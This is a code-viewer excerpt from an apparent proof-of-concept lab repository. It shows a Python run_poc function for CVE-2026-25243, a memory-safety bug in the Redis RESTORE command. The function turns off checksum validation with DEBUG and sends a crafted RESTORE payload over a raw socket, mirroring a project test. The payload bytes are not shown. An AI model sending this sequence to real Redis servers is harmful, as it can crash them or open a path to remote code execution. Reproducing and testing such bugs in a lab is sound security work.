INNER CODE UNIT · Python

run_poc

Unclecheng-li/poc-lab · Databases/CVE-2026-25243 Invalid Memory Access in Redis RESTORE Command May Lead to Remote Code Execution/exploit/exploit.py:42

def run_poc(host: str, port: int) -> str:
    """Same command sequence as dump.tcl CVE-2026-25243 test."""
    pipeline = b"".join(
        [
            resp_command("DEBUG", "SET-SKIP-CHECKSUM-VALIDATION", "1"),
            resp_command("RESTORE", KEY, "0", PAYLOAD),
            resp_command("DEBUG", "SET-SKIP-CHECKSUM-VALIDATION", "0"),
            resp_command("EXISTS", KEY),
        ]
    )
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(pipeline)
        return s.recv(65536).decode("utf-8", errors="replace")


def main() -> None:
    ap = argparse.ArgumentParser(description="CVE-2026-25243 (dump.tcl PoC)")
    ap.add_argument("--host", default="127.0.0.1")

View source record →

📰 Research Paper
Loading…
⏳ Fetching content…